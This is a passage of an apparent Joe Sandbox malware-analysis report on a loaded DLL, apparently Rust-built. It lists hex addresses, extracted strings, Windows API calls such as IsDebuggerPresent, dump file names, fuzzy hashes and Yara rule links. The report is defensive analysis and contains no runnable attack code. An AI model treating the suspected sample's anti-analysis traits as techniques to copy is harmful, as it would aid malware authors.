0x6eccaf12
0x6eccaf15
0x6eccaf18
0x6eccaf1a
0x6eccaefe
0x6eccaf02
0x00000000
0x6eccaf1c
0x6eccaf1c
0x6eccaf1e
0x6eccaf3f
0x6eccaf41
0x6eccaf43
0x6eccaf46
0x6eccaf49
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccaf20
0x6eccaf20
0x6eccaf24
0x6eccaf27
0x6eccaf2a
0x6eccaf2d
0x6eccaf30
0x6eccaf4b
0x6eccaf4b
0x6eccaf52
0x00000000
0x6eccaf32
0x6eccaf32
0x6eccaf32
0x6eccaf34
0x6eccaf56
0x6eccaf58
0x6eccaf58
0x6eccaf36
0x6eccaf36
0x6eccaf39
0x6eccaf3a
0x6eccaf3a
0x6eccaf5d
0x6eccaf5f
0x6eccaf62
0x6eccaf75
0x6eccaf79
0x6eccaf80
0x00000000
0x6eccaf64
0x6eccaf64
0x6eccaf68
0x6eccaf6a
0x6eccaf84
0x6eccaf84
0x6eccaf86
0x6eccaf6c
0x6eccaf6c
0x6eccaf6f
0x6eccaf70
0x6eccaf70
0x6eccaf8e
0x6eccaf97
0x6eccaf99
0x6eccaf9d
0x6eccafa3
0x6eccafa5
0x6eccaf04
0x6eccaf04
0x6eccaf04
0x6eccaf05
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccafa5
0x6eccaf62
0x6eccaf30
0x6eccaf1e
0x00000000
0x6eccaf1a
0x00000000
0x6eccaee2
0x6eccaee2
0x6eccaee2
0x6eccaee6
0x6eccaeea
0x6eccaeed
0x6eccaeef
0x6eccaef3
0x00000000
0x6eccaef9
0x6eccb17d
0x6eccb17d
0x6eccb181
0x6eccb183
0x6eccb30d
0x6eccb30d
0x6eccb30d
0x00000000
0x6eccb189
0x6eccb189
0x6eccb189
0x6eccb18d
0x6eccb190
0x00000000
0x6eccb196
0x6eccb196
0x6eccb19a
0x6eccb19e
0x6eccb1a0
0x6eccb1a2
0x6eccb1a4
0x6eccb1a7
0x6eccb1a9
0x6eccb260
0x6eccb260
0x00000000
0x6eccb1af
0x6eccb1cf
0x6eccb1d1
0x6eccb1d4
0x6eccb1d6
0x6eccb20e
0x6eccb210
0x6eccb212
0x6eccb215
0x6eccb218
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccb1d8
0x6eccb1df
0x6eccb1e1
0x6eccb1e4
0x6eccb1e7
0x6eccb1ea
0x6eccb21a
0x6eccb21d
0x00000000
0x6eccb1ec
0x6eccb1ec
0x6eccb1ec
0x6eccb1ee
0x6eccb223
0x6eccb228
0x6eccb22a
0x6eccb22d
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccb1f0
0x6eccb1f0
0x6eccb1f3
0x6eccb1fa
0x6eccb1fc
0x6eccb1ff
0x6eccb22f
0x6eccb232
0x00000000
0x6eccb201
0x6eccb201
0x6eccb201
0x6eccb203
0x6eccb236
0x6eccb236
0x6eccb238
0x6eccb205
0x6eccb205
0x6eccb208
0x6eccb209
0x6eccb209
0x6eccb245
0x6eccb247
0x6eccb24d
0x6eccb263
0x6eccb26b
0x6eccb26e
0x6eccb2a0
0x6eccb2a0
0x6eccb2a2
0x6eccb1c0
0x6eccb1c2
0x6eccb1c4
0x6eccb1c7
0x6eccb1c9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccb270
0x6eccb270
0x6eccb273
0x6eccb276
0x00000000
0x6eccb278
0x6eccb278
0x6eccb27b
0x6eccb27e
0x00000000
0x6eccb280
0x6eccb280
0x6eccb283
0x6eccb286
0x00000000
0x6eccb288
0x6eccb288
0x6eccb28b
0x6eccb28e
0x00000000
0x6eccb290
0x6eccb293
0x6eccb296
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccb296
0x6eccb28e
0x6eccb286
0x6eccb27e
0x6eccb276
0x6eccb24f
0x6eccb2a8
0x6eccb2a8
0x6eccb2ac
0x6eccb2b0
0x6eccb30f
0x6eccb30f
0x6eccb317
0x6eccb31e
0x6eccb321
0x6eccb328
0x6eccb32b
0x6eccb332
0x6eccb335
0x6eccb339
0x6eccb339
0x6eccb24d
0x6eccb1ff
0x6eccb1ee
0x6eccb1ea
0x6eccb1d6
0x6eccb1a9
0x6eccb190
0x00000000
0x6eccb183
0x6eccaef3
0x00000000
0x00000000
0x00000000
0x6eccadc6
0x6eccae08
0x6eccadf7
0x00000000
0x6eccade9
0x6eccafab
0x6eccafab
0x00000000
0x6eccafab
0x6eccad99
0x00000000
0x6eccad8b
0x6eccad7f
0x6eccac02
0x6eccac02
0x6eccac04
0x6eccac08
0x6eccac0d
0x6eccac0e
0x00000000
0x6eccac0e
0x6eccabfc
0x6eccabf2
0x6eccabdd
0x6eccabd1
0x6eccaba9
0x6eccb2bb
0x6eccb2bb
0x6eccb2bf
0x6eccb2c8
0x6eccb2c8
0x6eccaba7
0x6eccab93
0x6eccaa80
0x6eccaa72
0x6eccaa63
0x6eccaa40
0x6eccaa40
0x6eccaa43
0x6eccaa5a
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccaa45
0x6eccaa45
0x6eccaa49
0x00000000
0x6eccaa4b
0x6eccaa4b
0x6eccaa4b
0x6eccaa4e
0x6eccaa53
0x6eccaa54
0x00000000
0x6eccaa54
0x6eccaa49
0x6eccaa43
0x6eccaa3e
0x00000000
0x6ecca7dc
0x6ecca7e0
0x6ecca7e4
0x6ecca7e7
0x00000000
0x6ecca7ef
0x6ecca741
0x6ecca72f
0x00000000

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 6ECCBF8D
`fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6ECCB3C9
h, xrefs: 6ECCB6EB
SizeLimitExhausted, xrefs: 6ECCC0D9
.assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb, xrefs: 6ECCBB04, 6ECCBEC7
called `Option::unwrap()` on a `None` value, xrefs: 6ECCBF6E
__ZN, xrefs: 6ECCABD7
$, xrefs: 6ECCBA23
@*&<>()C,, xrefs: 6ECCBE70, 6ECCBF32
$, xrefs: 6ECCBA33
.llvm.C:svwynxjwzbblyzyvbzvnadthqulrlxkuotzeuguljzqomqtcmfyjwyjxmyqztcdrlrqahaumjphvoxxzmknnzpgbuuldukigsulxy, xrefs: 6ECCA6ED

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID: $$$$.assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb$.llvm.C:svwynxjwzbblyzyvbzvnadthqulrlxkuotzeuguljzqomqtcmfyjwyjxmyqztcdrlrqahaumjphvoxxzmknnzpgbuuldukigsulxy$@*&<>()C,$SizeLimitExhausted$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`$called `Option::unwrap()` on a `None` value$called `Result::unwrap()` on an `Err` value$h
API String ID: 0-2155986594
Opcode ID: 788ee4aae1cc1d6ac320900697de3d76906807ccfeb38576ac01b1ea1c2ac45e
Instruction ID: 69eda14e1b84ad378a99f8bfe8d5bad683d13b27f44d596ab06ecc3765a568e5
Opcode Fuzzy Hash: 788ee4aae1cc1d6ac320900697de3d76906807ccfeb38576ac01b1ea1c2ac45e
Instruction Fuzzy Hash: 5FE20471A083528FD314CFD9C49465AB7E2BBC9B14F148E1DE4A98B399E731D846CB83

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC5EA0, Relevance: 10.9, Strings: 8, Instructions: 927COMMON

Download Yara Rule

Strings

H, xrefs: 6ECC5FD9
" fn( -> = { }truefalse{0x, xrefs: 6ECCA519
_, xrefs: 6ECCA35B
)C,, xrefs: 6ECCA1FD
called `Option::unwrap()` on a `None` value, xrefs: 6ECCA6AF
{recursion limit reached}{invalid syntax}, xrefs: 6ECCA445
_, xrefs: 6ECCA34B
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECC6309

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID: " fn( -> = { }truefalse{0x$)C,$?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$H$_$_$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
API String ID: 0-4270729952
Opcode ID: f428d5e4441da97b832f36b016b4480321fd4d4cdcc96e1b81296784a951d355
Instruction ID: 100fdd4e32c9dc61cdf5a53b04efca9f3a482056122c3c9d8c6e007c4348aa16
Opcode Fuzzy Hash: f428d5e4441da97b832f36b016b4480321fd4d4cdcc96e1b81296784a951d355
Instruction Fuzzy Hash: A6623470A087018FE754CEA9D55436AB7E2AFC5B18F14892CE89A8B389F771D849C743

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC75F4, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6ECC7723
__aulldiv.LIBCMT ref: 6ECC7733

Strings

bool, xrefs: 6ECC788B
called `Option::unwrap()` on a `None` value, xrefs: 6ECC79BC
{recursion limit reached}{invalid syntax}, xrefs: 6ECC7C06
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECC7602, 6ECC7A59

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
API String ID: 3839614884-433696047
Opcode ID: 130868beb3e1cae89968022971cbdc0e8a63cac751531c8220564bfb329cfa05
Instruction ID: 9257e4851ca1cdeb3bb23c3499485f9ceafe313227e2bfc24fa191088d2d42c5
Opcode Fuzzy Hash: 130868beb3e1cae89968022971cbdc0e8a63cac751531c8220564bfb329cfa05
Instruction Fuzzy Hash: FCE1E1716087418FD705CFB8C4A076AB7E1EF86714F18896ED8958B3D5E334E8869B83

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDD1CC, Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6ECDD1D8
IsDebuggerPresent.KERNEL32 ref: 6ECDD2A4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6ECDD2C4
UnhandledExceptionFilter.KERNEL32(?), ref: 6ECDD2CE

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: ce23f849d44760825a2633185758ac8893e2a3165bffc9ecb90bc32d57822b02
Instruction ID: ba1b7dbfebf2585b4c3980a50dc32d8b1058133420c6af22cb77167a7b465de1
Opcode Fuzzy Hash: ce23f849d44760825a2633185758ac8893e2a3165bffc9ecb90bc32d57822b02
Instruction Fuzzy Hash: 92311675D052199FDF50DFA4C989BCCBBB8AF08304F1041AAE50DAB240EB759A89CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE29E6, Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6ECE2ADE
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6ECE2AE8
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6ECE2AF5

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9336baa2b0478af247007e27b80f9a233d0349e0d135ad6cd1eda61ba3b6d62d
Instruction ID: 0bf654e4cc387d456ff818bf3c8c57ffedf73931f9933f6504e32b223f7d6622
Opcode Fuzzy Hash: 9336baa2b0478af247007e27b80f9a233d0349e0d135ad6cd1eda61ba3b6d62d
Instruction Fuzzy Hash: 0F31C275901229ABCB61DF68D988BCCBBB8BF48310F5045EAE41DA7250EB749F85CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC9D50, Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

<>()C,, xrefs: 6ECC9DED
{recursion limit reached}{invalid syntax}, xrefs: 6ECC9FC2
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECC9DB6

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID: <>()C,$?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "${recursion limit reached}{invalid syntax}
API String ID: 0-2241449410
Opcode ID: beb25bd27fa6ffde9699ae6885e0bdf7e03d65f83f00c55017f6d7140051a3ea
Instruction ID: 568c2d26ea74c57b0ea49b023ec0db8271764bad3d41a6aa736a359146325eb9
Opcode Fuzzy Hash: beb25bd27fa6ffde9699ae6885e0bdf7e03d65f83f00c55017f6d7140051a3ea
Instruction Fuzzy Hash: F8811630708B028FE725CFA9C050796B7E6AF8AB1CF14892DD49A8B659F735D486C703

Uniqueness

Uniqueness Score: -1.00%

Function 6ECD01D0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 732COMMON

Download Yara Rule

Strings

<unknown>, xrefs: 6ECD0253

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: Heap$AllocProcess
String ID: <unknown>
API String ID: 1617791916-1574992787
Opcode ID: 5356367f7e4a349ce523af707f5ee054fd59fe1c61e49226f4d572529e78ac33
Instruction ID: 6847e60532538cf23426652404a74cd0f102a8e19cebe38b0996c4aecdf7799f
Opcode Fuzzy Hash: 5356367f7e4a349ce523af707f5ee054fd59fe1c61e49226f4d572529e78ac33
Instruction Fuzzy Hash: D762DD70E042698FDB15CFA8C8927DDBBB2BF49304F1481A9D949B7246F7329989CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC1C10, Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

?, xrefs: 6ECC1CCB
{invalid syntax}, xrefs: 6ECC1F98

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID: ?${invalid syntax}
API String ID: 0-3691751180
Opcode ID: 7d0b2ace175644f7afdcb45679e8d3c3be816e63b43ffba3bc170b88f778aded
Instruction ID: dc5b9117e0079aabbc05cb4c0f666e4157a48a319ef837b34a5c201150aba37d
Opcode Fuzzy Hash: 7d0b2ace175644f7afdcb45679e8d3c3be816e63b43ffba3bc170b88f778aded
Instruction Fuzzy Hash: 12B137316183268FC7058EAFC4905A9B7B2BF8AB44F04875EF8E55B245F731D94A8783

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC66E0, Relevance: 2.8, Strings: 2, Instructions: 252COMMON

Download Yara Rule

Strings

{invalid syntax}, xrefs: 6ECC697D
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECC66F9

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "${invalid syntax}
API String ID: 0-903684146
Opcode ID: 45d20b93b829d61df7338931b1c241101498d6628ebe74c6d637ee83d3116bb3
Instruction ID: f307a5ca4a8b5b634f6fb85342ef2fc2d7ae1626d54dc9f23a5f9120e70e0d37
Opcode Fuzzy Hash: 45d20b93b829d61df7338931b1c241101498d6628ebe74c6d637ee83d3116bb3
Instruction Fuzzy Hash: B6811670738B014FEB648EE69760376B3E2AF81F14F14482CC89A4B78AF675E4858343

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE0A61, Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,6ECE0A5C,?,?,?,?,?,?,00000000), ref: 6ECE0C8E

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6509480fbc6a6b1c98dca2dda6a8ab9fdc259bc54a4814a790e877979d187169
Instruction ID: f36522fe277f8f30485fbfb9f1e3dca3161ee729735b05a9bb71f7699f5562b0
Opcode Fuzzy Hash: 6509480fbc6a6b1c98dca2dda6a8ab9fdc259bc54a4814a790e877979d187169
Instruction Fuzzy Hash: E4B17A31210609CFD744CF68C4A7B957BA0FF45364F258658E8E9CF6A5E735EA82CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDCC44, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6ECDCC5A

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 1d977df2867bbbb4149491761f924fa95749516e7808b92662d5d17758c1a408
Instruction ID: c85c6954404f492143ec6fd40c12751280626f61601235f35c0f3088ba394648
Opcode Fuzzy Hash: 1d977df2867bbbb4149491761f924fa95749516e7808b92662d5d17758c1a408
Instruction Fuzzy Hash: 065190B1A106058FFB05CF95C882BDABBF4FB89350F20802AC515EB644E376D906CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE2FE7, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20f3fc49c35f56f8bd3ac8258c680a8a3b5bc71e09a4edc85c452ee66478d68
Instruction ID: 795818b4eacf173b2a211cdc7ebefe8091387dc16d084269ee28d37ebd4d93ba
Opcode Fuzzy Hash: b20f3fc49c35f56f8bd3ac8258c680a8a3b5bc71e09a4edc85c452ee66478d68
Instruction Fuzzy Hash: 2C41C3B5804219AFDB14DFA9CC98AEABBBCEF45304F1446DDE419D3214EB35AE858F10

Uniqueness

Uniqueness Score: -1.00%

Function 6ECD0F10, Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

UNC\, xrefs: 6ECD1143

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID: UNC\
API String ID: 0-505053535
Opcode ID: 9b8c2e09106b6bfe1417ee98dbc4805e791ef934adf89756feacbd22b140464c
Instruction ID: 503fafac0266d07de61ee964ae836d7bbda96c2c1e701bda7dee92a63a3a45ab
Opcode Fuzzy Hash: 9b8c2e09106b6bfe1417ee98dbc4805e791ef934adf89756feacbd22b140464c
Instruction Fuzzy Hash: 57D1D5316087468FC350CE9EC5C065AB7E3AB85314F648759E6A88B399F633DD4ECB81

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC38C0, Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fadd28b9d180c94720987c7ea89eb938f686111b53ea62cc6b49539da3945ab7
Instruction ID: 0500ccd74959cd02098ac18a04c8c8aed40dbcdbaadbde9d9b0c8dd4067867e3
Opcode Fuzzy Hash: fadd28b9d180c94720987c7ea89eb938f686111b53ea62cc6b49539da3945ab7
Instruction Fuzzy Hash: 2F020131B187158FC305DEBED49426AB3E2AFDA700F11CB6EE885A7354F770A8418782

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDBFE0, Relevance: .0, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0862b3f83b14ccb74f95c828ec3a1d4b4d77b25e0d0b5479d19b2a336de3f31c
Instruction ID: 68bcdda43aac767b5fa9568e6004ada6048d24f69ce2f8b78b113080f604e700
Opcode Fuzzy Hash: 0862b3f83b14ccb74f95c828ec3a1d4b4d77b25e0d0b5479d19b2a336de3f31c
Instruction Fuzzy Hash: 1E018C353112058FD748CF68C4A0F2AB3E2FF45788F5584A9D522CF719EB32E844DA40

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE298C, Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
